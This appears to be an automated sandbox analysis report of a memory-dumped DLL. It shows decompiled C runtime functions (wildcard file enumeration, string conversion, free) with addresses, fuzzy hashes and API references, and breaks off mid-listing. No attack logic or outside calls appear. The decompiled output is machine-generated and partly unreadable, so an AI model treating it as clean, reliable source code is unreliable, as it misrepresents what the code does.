    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 67db46bfe3e73b36354a24cd1ef346c3b51c06d45680648de54be88c8fd1ccb1
    • Instruction ID: 8cd5fa55a0259f9ec861b08138b962f05a0233a4878f87d1ac3dccf7d40dd8f2
    • Opcode Fuzzy Hash: 67db46bfe3e73b36354a24cd1ef346c3b51c06d45680648de54be88c8fd1ccb1
    • Instruction Fuzzy Hash: C261307AD012199FDF14CFA9C8806EEFBF9EF88350B1985A9E855E7300D7719E418B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E6D868686(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				signed int _v6;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v72;
    				intOrPtr* _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				signed int _v124;
    				struct _WIN32_FIND_DATAW _v608;
    				char _v609;
    				intOrPtr* _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				union _FINDEX_INFO_LEVELS _v628;
    				signed int _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				union _FINDEX_INFO_LEVELS _v640;
    				signed int _v644;
    				signed int _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				union _FINDEX_INFO_LEVELS _v664;
    				signed int _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				union _FINDEX_INFO_LEVELS _v676;
    				intOrPtr _v724;
    				void* __ebp;
    				intOrPtr* _t131;
    				signed int _t132;
    				signed int _t134;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr* _t150;
    				signed int _t152;
    				intOrPtr _t153;
    				signed int _t157;
    				signed int _t159;
    				signed int _t164;
    				signed int _t166;
    				char _t168;
    				signed char _t169;
    				signed int _t175;
    				union _FINDEX_INFO_LEVELS _t179;
    				signed int _t185;
    				union _FINDEX_INFO_LEVELS _t188;
    				intOrPtr* _t196;
    				signed int _t199;
    				intOrPtr _t205;
    				signed int _t207;
    				signed int _t210;
    				signed int _t212;
    				signed int _t213;
    				signed int _t214;
    				signed int _t216;
    				signed int _t218;
    				signed int _t219;
    				signed int* _t220;
    				signed int _t223;
    				void* _t226;
    				union _FINDEX_INFO_LEVELS _t227;
    				intOrPtr _t230;
    				signed int _t233;
    				signed int _t234;
    				signed int _t235;
    				signed int _t237;
    				intOrPtr* _t240;
    				signed int _t242;
    				intOrPtr* _t245;
    				signed int _t250;
    				signed int _t256;
    				signed int _t258;
    				signed int _t264;
    				intOrPtr* _t265;
    				signed int _t273;
    				signed int _t275;
    				intOrPtr* _t276;
    				void* _t278;
    				intOrPtr* _t279;
    				signed int _t282;
    				signed int _t285;
    				signed int _t287;
    				intOrPtr _t289;
    				signed int* _t294;
    				signed int _t295;
    				signed int _t297;
    				signed int _t298;
    				signed int _t299;
    				signed int _t301;
    				void* _t302;
    				void* _t303;
    				signed int _t305;
    				void* _t309;
    				signed int _t310;
    				void* _t311;
    				void* _t312;
    				void* _t313;
    				signed int _t314;
    				void* _t315;
    				void* _t316;
    
    				_t131 = _a8;
    				_t312 = _t311 - 0x28;
    				_t320 = _t131;
    				if(_t131 != 0) {
    					_t294 = _a4;
    					_t223 = 0;
    					 *_t131 = 0;
    					_t285 = 0;
    					_t132 =  *_t294;
    					_t233 = 0;
    					_v608.cAlternateFileName = 0;
    					_v40 = 0;
    					_v36 = 0;
    					__eflags = _t132;
    					if(_t132 == 0) {
    						L9:
    						_v8 = _t223;
    						_t134 = _t233 - _t285;
    						_t295 = _t285;
    						_v12 = _t295;
    						_t272 = (_t134 >> 2) + 1;
    						_t136 = _t134 + 3 >> 2;
    						__eflags = _t233 - _t295;
    						_v16 = (_t134 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
    						__eflags = _t297;
    						if(_t297 != 0) {
    							_t214 = _t285;
    							_t282 = _t223;
    							do {
    								_t265 =  *_t214;
    								_t20 = _t265 + 1; // 0x1
    								_v20 = _t20;
    								do {
    									_t216 =  *_t265;
    									_t265 = _t265 + 1;
    									__eflags = _t216;
    								} while (_t216 != 0);
    								_t223 = _t223 + 1 + _t265 - _v20;
    								_t214 = _v12 + 4;
    								_t282 = _t282 + 1;
    								_v12 = _t214;
    								__eflags = _t282 - _t297;
    							} while (_t282 != _t297);
    							_t272 = _v16;
    							_v8 = _t223;
    							_t223 = 0;
    							__eflags = 0;
    						}
    						_t298 = E6D8672E5(_t136, _t272, _v8, 1);
    						_t313 = _t312 + 0xc;
    						__eflags = _t298;
    						if(_t298 != 0) {
    							_v12 = _t285;
    							_t139 = _t298 + _v16 * 4;
    							_t234 = _t139;
    							_v28 = _t139;
    							_t140 = _t285;
    							_v16 = _t234;
    							__eflags = _t140 - _v40;
    							if(_t140 == _v40) {
    								L24:
    								_v12 = _t223;
    								 *_a8 = _t298;
    								_t299 = _t223;
    								goto L25;
    							} else {
    								_t275 = _t298 - _t285;
    								__eflags = _t275;
    								_v32 = _t275;
    								do {
    									_t150 =  *_t140;
    									_t276 = _t150;
    									_v24 = _t150;
    									_v20 = _t276 + 1;
    									do {
    										_t152 =  *_t276;
    										_t276 = _t276 + 1;
    										__eflags = _t152;
    									} while (_t152 != 0);
    									_t153 = _t276 - _v20 + 1;
    									_push(_t153);
    									_v20 = _t153;
    									_t157 = E6D86B297(_t234, _v28 - _t234 + _v8, _v24);
    									_t313 = _t313 + 0x10;
    									__eflags = _t157;
    									if(_t157 != 0) {
    										_push(_t223);
    										_push(_t223);
    										_push(_t223);
    										_push(_t223);
    										_push(_t223);
    										E6D8669AE();
    										asm("int3");
    										_t309 = _t313;
    										_push(_t234);
    										_t240 = _v72;
    										_t65 = _t240 + 1; // 0x1
    										_t278 = _t65;
    										do {
    											_t159 =  *_t240;
    											_t240 = _t240 + 1;
    											__eflags = _t159;
    										} while (_t159 != 0);
    										_push(_t285);
    										_t287 = _a8;
    										_t242 = _t240 - _t278 + 1;
    										_v12 = _t242;
    										__eflags = _t242 -  !_t287;
    										if(_t242 <=  !_t287) {
    											_push(_t223);
    											_push(_t298);
    											_t68 = _t287 + 1; // 0x1
    											_t226 = _t68 + _t242;
    											_t302 = E6D868473(_t226, 1);
    											__eflags = _t287;
    											if(_t287 == 0) {
    												L40:
    												_push(_v12);
    												_t226 = _t226 - _t287;
    												_t164 = E6D86B297(_t302 + _t287, _t226, _v0);
    												_t314 = _t313 + 0x10;
    												__eflags = _t164;
    												if(_t164 != 0) {
    													goto L45;
    												} else {
    													_t230 = _a12;
    													_t207 = E6D868C70(_t230);
    													_v12 = _t207;
    													__eflags = _t207;
    													if(_t207 == 0) {
    														 *( *(_t230 + 4)) = _t302;
    														_t305 = 0;
    														_t77 = _t230 + 4;
    														 *_t77 =  *(_t230 + 4) + 4;
    														__eflags =  *_t77;
    													} else {
    														E6D867CC2(_t302);
    														_t305 = _v12;
    													}
    													E6D867CC2(0);
    													_t210 = _t305;
    													goto L37;
    												}
    											} else {
    												_push(_t287);
    												_t212 = E6D86B297(_t302, _t226, _a4);
    												_t314 = _t313 + 0x10;
    												__eflags = _t212;
    												if(_t212 != 0) {
    													L45:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E6D8669AE();
    													asm("int3");
    													_push(_t309);
    													_t310 = _t314;
    													_t315 = _t314 - 0x298;
    													_t166 =  *0x6d877014; // 0x6a907f72
    													_v124 = _t166 ^ _t310;
    													_t245 = _v108;
    													_t279 = _v104;
    													_push(_t226);
    													_push(0);
    													_t289 = _v112;
    													_v724 = _t279;
    													__eflags = _t245 - _t289;
    													if(_t245 != _t289) {
    														while(1) {
    															_t205 =  *_t245;
    															__eflags = _t205 - 0x2f;
    															if(_t205 == 0x2f) {
    																break;
    															}
    															__eflags = _t205 - 0x5c;
    															if(_t205 != 0x5c) {
    																__eflags = _t205 - 0x3a;
    																if(_t205 != 0x3a) {
    																	_t245 = E6D86B2F0(_t289, _t245);
    																	__eflags = _t245 - _t289;
    																	if(_t245 != _t289) {
    																		continue;
    																	}
    																}
    															}
    															break;
    														}
    														_t279 = _v616;
    													}
    													_t168 =  *_t245;
    													_v609 = _t168;
    													__eflags = _t168 - 0x3a;
    													if(_t168 != 0x3a) {
    														L56:
    														_t227 = 0;
    														__eflags = _t168 - 0x2f;
    														if(__eflags == 0) {
    															L59:
    															_t169 = 1;
    														} else {
    															__eflags = _t168 - 0x5c;
    															if(__eflags == 0) {
    																goto L59;
    															} else {
    																__eflags = _t168 - 0x3a;
    																_t169 = 0;
    																if(__eflags == 0) {
    																	goto L59;
    																}
    															}
    														}
    														_v676 = _t227;
    														_v672 = _t227;
    														_push(_t302);
    														asm("sbb eax, eax");
    														_v668 = _t227;
    														_v664 = _t227;
    														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
    														_v660 = _t227;
    														_v656 = _t227;
    														_t175 = E6D868669(_t245 - _t289 + 1, _t289,  &_v676, E6D868B7D(_t279, __eflags));
    														_t316 = _t315 + 0xc;
    														asm("sbb eax, eax");
    														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
    														_t303 = _t179;
    														__eflags = _t303 - 0xffffffff;
    														if(_t303 != 0xffffffff) {
    															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
    															__eflags = _t250;
    															_v648 = _t250 >> 2;
    															do {
    																_v640 = _t227;
    																_v636 = _t227;
    																_v632 = _t227;
    																_v628 = _t227;
    																_v624 = _t227;
    																_v620 = _t227;
    																_t185 = E6D86859A( &(_v608.cFileName),  &_v640,  &_v609, E6D868B7D(_t279, __eflags));
    																_t316 = _t316 + 0x10;
    																asm("sbb eax, eax");
    																_t188 =  !( ~_t185) & _v632;
    																__eflags =  *_t188 - 0x2e;
    																if( *_t188 != 0x2e) {
    																	L67:
    																	_push(_v616);
    																	_push(_v644);
    																	_push(_t289);
    																	_push(_t188);
    																	L33();
    																	_t316 = _t316 + 0x10;
    																	_v652 = _t188;
    																	__eflags = _t188;
    																	if(_t188 != 0) {
    																		__eflags = _v620 - _t227;
    																		if(_v620 != _t227) {
    																			E6D867CC2(_v632);
    																			_t188 = _v652;
    																		}
    																		_t227 = _t188;
    																	} else {
    																		goto L68;
    																	}
    																} else {
    																	_t256 =  *((intOrPtr*)(_t188 + 1));
    																	__eflags = _t256;
    																	if(_t256 == 0) {
    																		goto L68;
    																	} else {
    																		__eflags = _t256 - 0x2e;
    																		if(_t256 != 0x2e) {
    																			goto L67;
    																		} else {
    																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
    																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
    																				goto L68;
    																			} else {
    																				goto L67;
    																			}
    																		}
    																	}
    																}
    																L76:
    																FindClose(_t303);
    																goto L77;
    																L68:
    																__eflags = _v620 - _t227;
    																if(_v620 != _t227) {
    																	E6D867CC2(_v632);
    																}
    																__eflags = FindNextFileW(_t303,  &_v608);
    															} while (__eflags != 0);
    															_t196 = _v616;
    															_t258 = _v648;
    															_t280 =  *_t196;
    															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
    															__eflags = _t258 - _t199;
    															if(_t258 != _t199) {
    																E6D86ADA0(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6D8684D0);
    															}
    															goto L76;
    														} else {
    															_push(_v616);
    															_push(_t227);
    															_push(_t227);
    															_push(_t289);
    															L33();
    															_t227 = _t179;
    														}
    														L77:
    														__eflags = _v656;
    														if(_v656 != 0) {
    															E6D867CC2(_v668);
    														}
    													} else {
    														__eflags = _t245 - _t289 + 1;
    														if(_t245 == _t289 + 1) {
    															_t168 = _v609;
    															goto L56;
    														} else {
    															_push(_t279);
    															_push(0);
    															_push(0);
    															_push(_t289);
    															L33();
    														}
    													}
    													__eflags = _v16 ^ _t310;
    													return E6D864095(_v16 ^ _t310);
    												} else {
    													goto L40;
    												}
    											}
    										} else {
    											_t210 = 0xc;
    											L37:
    											return _t210;
    										}
    									} else {
    										goto L23;
    									}
    									goto L81;
    									L23:
    									_t213 = _v12;
    									_t264 = _v16;
    									 *((intOrPtr*)(_v32 + _t213)) = _t264;
    									_t140 = _t213 + 4;
    									_t234 = _t264 + _v20;
    									_v16 = _t234;
    									_v12 = _t140;
    									__eflags = _t140 - _v40;
    								} while (_t140 != _v40);
    								goto L24;
    							}
    						} else {
    							_t299 = _t298 | 0xffffffff;
    							_v12 = _t299;
    							L25:
    							E6D867CC2(_t223);
    							_pop(_t235);
    							goto L26;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t223;
    							_t218 = E6D86B2B0(_t132,  &_v8);
    							_t235 =  *_t294;
    							__eflags = _t218;
    							if(_t218 != 0) {
    								_push( &(_v608.cAlternateFileName));
    								_push(_t218);
    								_push(_t235);
    								L46();
    								_t312 = _t312 + 0xc;
    								_v12 = _t218;
    								_t299 = _t218;
    							} else {
    								_t219 =  &(_v608.cAlternateFileName);
    								_push(_t219);
    								_push(_t223);
    								_push(_t223);
    								_push(_t235);
    								L33();
    								_t299 = _t219;
    								_t312 = _t312 + 0x10;
    								_v12 = _t299;
    							}
    							__eflags = _t299;
    							if(_t299 != 0) {
    								break;
    							}
    							_t294 =  &(_a4[1]);
    							_a4 = _t294;
    							_t132 =  *_t294;
    							__eflags = _t132;
    							if(_t132 != 0) {
    								continue;
    							} else {
    								_t285 = _v608.cAlternateFileName;
    								_t233 = _v40;
    								goto L9;
    							}
    							goto L81;
    						}
    						_t285 = _v608.cAlternateFileName;
    						L26:
    						_t273 = _t285;
    						_v32 = _t273;
    						__eflags = _v40 - _t273;
    						asm("sbb ecx, ecx");
    						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
    						__eflags = _t237;
    						_v28 = _t237;
    						if(_t237 != 0) {
    							_t301 = _t237;
    							do {
    								E6D867CC2( *_t285);
    								_t223 = _t223 + 1;
    								_t285 = _t285 + 4;
    								__eflags = _t223 - _t301;
    							} while (_t223 != _t301);
    							_t285 = _v608.cAlternateFileName;
    							_t299 = _v12;
    						}
    						E6D867CC2(_t285);
    						goto L31;
    					}
    				} else {
    					_t220 = E6D866A5B(_t320);
    					_t299 = 0x16;
    					 *_t220 = _t299;
    					E6D86699E();
    					L31:
    					return _t299;
    				}
    				L81:
    			}















































































































    0x6d86868b
    0x6d86868e
    0x6d868692
    0x6d868694
    0x6d8686aa
    0x6d8686ae
    0x6d8686b1
    0x6d8686b3
    0x6d8686b5
    0x6d8686b7
    0x6d8686b9
    0x6d8686bc
    0x6d8686bf
    0x6d8686c2
    0x6d8686c4
    0x6d868727
    0x6d868729
    0x6d86872c
    0x6d86872e
    0x6d868732
    0x6d86873b
    0x6d86873c
    0x6d86873f
    0x6d868741
    0x6d868744
    0x6d868748
    0x6d868748
    0x6d86874a
    0x6d86874c
    0x6d86874e
    0x6d868750
    0x6d868750
    0x6d868752
    0x6d868755
    0x6d868758
    0x6d868758
    0x6d86875a
    0x6d86875b
    0x6d86875b
    0x6d868766
    0x6d868768
    0x6d86876b
    0x6d86876c
    0x6d86876f
    0x6d86876f
    0x6d868773
    0x6d868776
    0x6d868779
    0x6d868779
    0x6d868779
    0x6d868786
    0x6d868788
    0x6d86878b
    0x6d86878d
    0x6d8687a5
    0x6d8687a8
    0x6d8687ab
    0x6d8687ad
    0x6d8687b0
    0x6d8687b2
    0x6d8687b5
    0x6d8687b8
    0x6d868815
    0x6d868818
    0x6d86881b
    0x6d86881d
    0x00000000
    0x6d8687ba
    0x6d8687bc
    0x6d8687bc
    0x6d8687be
    0x6d8687c1
    0x6d8687c1
    0x6d8687c3
    0x6d8687c5
    0x6d8687cb
    0x6d8687ce
    0x6d8687ce
    0x6d8687d0
    0x6d8687d1
    0x6d8687d1
    0x6d8687d8
    0x6d8687db
    0x6d8687df
    0x6d8687ec
    0x6d8687f1
    0x6d8687f4
    0x6d8687f6
    0x6d86886a
    0x6d86886b
    0x6d86886c
    0x6d86886d
    0x6d86886e
    0x6d86886f
    0x6d868874
    0x6d868878
    0x6d86887a
    0x6d86887b
    0x6d86887e
    0x6d86887e
    0x6d868881
    0x6d868881
    0x6d868883
    0x6d868884
    0x6d868884
    0x6d868888
    0x6d868889
    0x6d868890
    0x6d868893
    0x6d868896
    0x6d868898
    0x6d8688a0
    0x6d8688a1
    0x6d8688a2
    0x6d8688a5
    0x6d8688af
    0x6d8688b3
    0x6d8688b5
    0x6d8688c9
    0x6d8688c9
    0x6d8688cc
    0x6d8688d6
    0x6d8688db
    0x6d8688de
    0x6d8688e0
    0x00000000
    0x6d8688e2
    0x6d8688e2
    0x6d8688e7
    0x6d8688ee
    0x6d8688f1
    0x6d8688f3
    0x6d868904
    0x6d868906
    0x6d868908
    0x6d868908
    0x6d868908
    0x6d8688f5
    0x6d8688f6
    0x6d8688fb
    0x6d8688fe
    0x6d86890d
    0x6d868913
    0x00000000
    0x6d868916
    0x6d8688b7
    0x6d8688b7
    0x6d8688bd
    0x6d8688c2
    0x6d8688c5
    0x6d8688c7
    0x6d868919
    0x6d86891b
    0x6d86891c
    0x6d86891d
    0x6d86891e
    0x6d86891f
    0x6d868920
    0x6d868925
    0x6d868928
    0x6d868929
    0x6d86892b
    0x6d868931
    0x6d868938
    0x6d86893b
    0x6d86893e
    0x6d868941
    0x6d868942
    0x6d868943
    0x6d868946
    0x6d86894c
    0x6d86894e
    0x6d868950
    0x6d868950
    0x6d868952
    0x6d868954
    0x00000000
    0x00000000
    0x6d868956
    0x6d868958
    0x6d86895a
    0x6d86895c
    0x6d868967
    0x6d868969
    0x6d86896b
    0x00000000
    0x00000000
    0x6d86896b
    0x6d86895c
    0x00000000
    0x6d868958
    0x6d86896d
    0x6d86896d
    0x6d868973
    0x6d868975
    0x6d86897b
    0x6d86897d
    0x6d86899f
    0x6d86899f
    0x6d8689a1
    0x6d8689a3
    0x6d8689af
    0x6d8689af
    0x6d8689a5
    0x6d8689a5
    0x6d8689a7
    0x00000000
    0x6d8689a9
    0x6d8689a9
    0x6d8689ab
    0x6d8689ad
    0x00000000
    0x00000000
    0x6d8689ad
    0x6d8689a7
    0x6d8689b7
    0x6d8689bf
    0x6d8689c5
    0x6d8689c6
    0x6d8689c8
    0x6d8689d0
    0x6d8689d6
    0x6d8689dc
    0x6d8689e2
    0x6d8689f6
    0x6d8689fb
    0x6d868a06
    0x6d868a16
    0x6d868a1c
    0x6d868a1e
    0x6d868a21
    0x6d868a44
    0x6d868a44
    0x6d868a49
    0x6d868a4f
    0x6d868a4f
    0x6d868a55
    0x6d868a5b
    0x6d868a61
    0x6d868a67
    0x6d868a6d
    0x6d868a8e
    0x6d868a93
    0x6d868a98
    0x6d868a9c
    0x6d868aa2
    0x6d868aa5
    0x6d868ab8
    0x6d868ab8
    0x6d868abe
    0x6d868ac4
    0x6d868ac5
    0x6d868ac6
    0x6d868acb
    0x6d868ace
    0x6d868ad4
    0x6d868ad6
    0x6d868b34
    0x6d868b3a
    0x6d868b42
    0x6d868b47
    0x6d868b4d
    0x6d868b4e
    0x00000000
    0x00000000
    0x00000000
    0x6d868aa7
    0x6d868aa7
    0x6d868aaa
    0x6d868aac
    0x00000000
    0x6d868aae
    0x6d868aae
    0x6d868ab1
    0x00000000
    0x6d868ab3
    0x6d868ab3
    0x6d868ab6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d868ab6
    0x6d868ab1
    0x6d868aac
    0x6d868b50
    0x6d868b51
    0x00000000
    0x6d868ad8
    0x6d868ad8
    0x6d868ade
    0x6d868ae6
    0x6d868aeb
    0x6d868afa
    0x6d868afa
    0x6d868b02
    0x6d868b08
    0x6d868b0e
    0x6d868b15
    0x6d868b18
    0x6d868b1a
    0x6d868b2a
    0x6d868b2f
    0x00000000
    0x6d868a23
    0x6d868a23
    0x6d868a29
    0x6d868a2a
    0x6d868a2b
    0x6d868a2c
    0x6d868a34
    0x6d868a34
    0x6d868b57
    0x6d868b57
    0x6d868b5f
    0x6d868b67
    0x6d868b6c
    0x6d86897f
    0x6d868982
    0x6d868984
    0x6d868999
    0x00000000
    0x6d868986
    0x6d868986
    0x6d868989
    0x6d86898a
    0x6d86898b
    0x6d86898c
    0x6d868991
    0x6d868984
    0x6d868b73
    0x6d868b7c
    0x00000000
    0x00000000
    0x00000000
    0x6d8688c7
    0x6d86889a
    0x6d86889c
    0x6d86889d
    0x6d86889f
    0x6d86889f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d8687f8
    0x6d8687f8
    0x6d8687fe
    0x6d868801
    0x6d868804
    0x6d868807
    0x6d86880a
    0x6d86880d
    0x6d868810
    0x6d868810
    0x00000000
    0x6d8687c1
    0x6d86878f
    0x6d86878f
    0x6d868792
    0x6d86881f
    0x6d868820
    0x6d868825
    0x00000000
    0x6d868825
    0x6d8686c6
    0x6d8686c6
    0x6d8686c9
    0x6d8686d1
    0x6d8686d4
    0x6d8686db
    0x6d8686dd
    0x6d8686df
    0x6d8686fa
    0x6d8686fb
    0x6d8686fc
    0x6d8686fd
    0x6d868702
    0x6d868705
    0x6d868708
    0x6d8686e1
    0x6d8686e1
    0x6d8686e4
    0x6d8686e5
    0x6d8686e6
    0x6d8686e7
    0x6d8686e8
    0x6d8686ed
    0x6d8686ef
    0x6d8686f2
    0x6d8686f2
    0x6d86870a
    0x6d86870c
    0x00000000
    0x00000000
    0x6d868715
    0x6d868718
    0x6d86871b
    0x6d86871d
    0x6d86871f
    0x00000000
    0x6d868721
    0x6d868721
    0x6d868724
    0x00000000
    0x6d868724
    0x00000000
    0x6d86871f
    0x6d86879a
    0x6d868826
    0x6d868829
    0x6d86882d
    0x6d868836
    0x6d868839
    0x6d86883d
    0x6d86883d
    0x6d86883f
    0x6d868842
    0x6d868844
    0x6d868846
    0x6d868848
    0x6d86884d
    0x6d86884e
    0x6d868852
    0x6d868852
    0x6d868856
    0x6d868859
    0x6d868859
    0x6d86885d
    0x00000000
    0x6d868864
    0x6d868696
    0x6d868696
    0x6d86869d
    0x6d86869e
    0x6d8686a0
    0x6d868865
    0x6d868869
    0x6d868869
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: c75a2ad59e0c041727f9921a7f737aa3d5d6dad7299e3ecf3ba430c038b1c415
    • Instruction ID: 1f44ef9827624fde032d7c1c81c7c17268b4bb2b6d4aa8218b9ffe45f77e94a5
    • Opcode Fuzzy Hash: c75a2ad59e0c041727f9921a7f737aa3d5d6dad7299e3ecf3ba430c038b1c415
    • Instruction Fuzzy Hash: 39619EB5E0425AAFCB04CFA9C8845EDFBF5EF49320B158569E918F7340D730AE418BA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 21d9766ffed661443d41726d093e7c48fa334fdd5e103aaeb707956e1c14e358
    • Instruction ID: aaf4ef41984f13350a647e5dd123cd34822031cafa47602936d0e88c98ac0f77
    • Opcode Fuzzy Hash: 21d9766ffed661443d41726d093e7c48fa334fdd5e103aaeb707956e1c14e358
    • Instruction Fuzzy Hash: 2CB13876D062959FDB15CF28C840BEEBBEDEF86350F18C1EAF8459B241D6348909CB61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 893840c03d31098680b52c39b3e4b0284f697132cf43f4a12ab01ce4610a28b2
    • Instruction ID: 32e51d2f6ec8c4ce1bca868db9d03b9ac27cdf86a2958993ef9f915df3b50356
    • Opcode Fuzzy Hash: 893840c03d31098680b52c39b3e4b0284f697132cf43f4a12ab01ce4610a28b2
    • Instruction Fuzzy Hash: D451D47650671ADFEB29CF50D840BAAB7E8FF84201F18452DD8424B198D736E981C794
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 27d168040d483e6b7c724327e10d7280edbbd0c6489ab8ba8bd649047910272e
    • Instruction ID: a330ec805632db6aa86fd4048780d79cfaa4aca7fb36d68efd91ac7de4bcde3c
    • Opcode Fuzzy Hash: 27d168040d483e6b7c724327e10d7280edbbd0c6489ab8ba8bd649047910272e
    • Instruction Fuzzy Hash: 4C51A1F6A022039FDB65DF14D840BBAB7E9EF44314F184539ED518B1A0E731EA90CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 0303A014: _free.LIBCMT ref: 0303A022
      • Part of subcall function 03039814: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0303E350,?,00000000,00000000), ref: 030398C0
    • GetLastError.KERNEL32 ref: 03039A5A
    • __dosmaperr.LIBCMT ref: 03039A61
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 03039AA0
    • __dosmaperr.LIBCMT ref: 03039AA7
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 8bdb264abfc5dbefc708f70643f098c3f38962b1b30a368e7339a0fd2ecf983f
    • Instruction ID: 02d44e03f0904e9b70e7b7ebe838328c77f075fc9744479241d81d220e067390
    • Opcode Fuzzy Hash: 8bdb264abfc5dbefc708f70643f098c3f38962b1b30a368e7339a0fd2ecf983f
    • Instruction Fuzzy Hash: 4C21AAB5602B156FDB20EF668C80FAB77ACEF463647148658F9299B250E7B0DC5087E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86859A(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t19;
    				intOrPtr _t29;
    				char _t31;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    
    				_t40 = _a4;
    				if(_t40 != 0) {
    					_t31 = 0;
    					__eflags =  *_t40;
    					if( *_t40 != 0) {
    						_t16 = E6D869796(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t16;
    						if(__eflags != 0) {
    							_t38 = _a8;
    							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
    							if(__eflags <= 0) {
    								L11:
    								_t17 = E6D869796(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
    								__eflags = _t17;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
    									_t19 = 0;
    									__eflags = 0;
    								} else {
    									E6D866A25(GetLastError());
    									_t19 =  *((intOrPtr*)(E6D866A5B(__eflags)));
    								}
    								L14:
    								return _t19;
    							}
    							_t19 = E6D868BD6(_t38, __eflags, _t16);
    							__eflags = _t19;
    							if(_t19 != 0) {
    								goto L14;
    							}
    							goto L11;
    						}
    						E6D866A25(GetLastError());
    						return  *((intOrPtr*)(E6D866A5B(__eflags)));
    					}
    					_t41 = _a8;
    					__eflags =  *((intOrPtr*)(_t41 + 0xc));
    					if(__eflags != 0) {
    						L6:
    						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
    						L2:
    						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
    						return 0;
    					}
    					_t29 = E6D868BD6(_t41, __eflags, 1);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						return _t29;
    					}
    					goto L6;
    				}
    				_t41 = _a8;
    				E6D868BBC(_t41);
    				_t31 = 0;
    				 *((intOrPtr*)(_t41 + 8)) = 0;
    				 *((intOrPtr*)(_t41 + 0xc)) = 0;
    				goto L2;
    			}











    0x6d8685a1
    0x6d8685a6
    0x6d8685c4
    0x6d8685c6
    0x6d8685c9
    0x6d8685f6
    0x6d8685fe
    0x6d868600
    0x6d868619
    0x6d86861c
    0x6d86861f
    0x6d86862d
    0x6d86863c
    0x6d868644
    0x6d868646
    0x6d86865f
    0x6d868662
    0x6d868662
    0x6d868648
    0x6d86864f
    0x6d86865a
    0x6d86865a
    0x6d868664
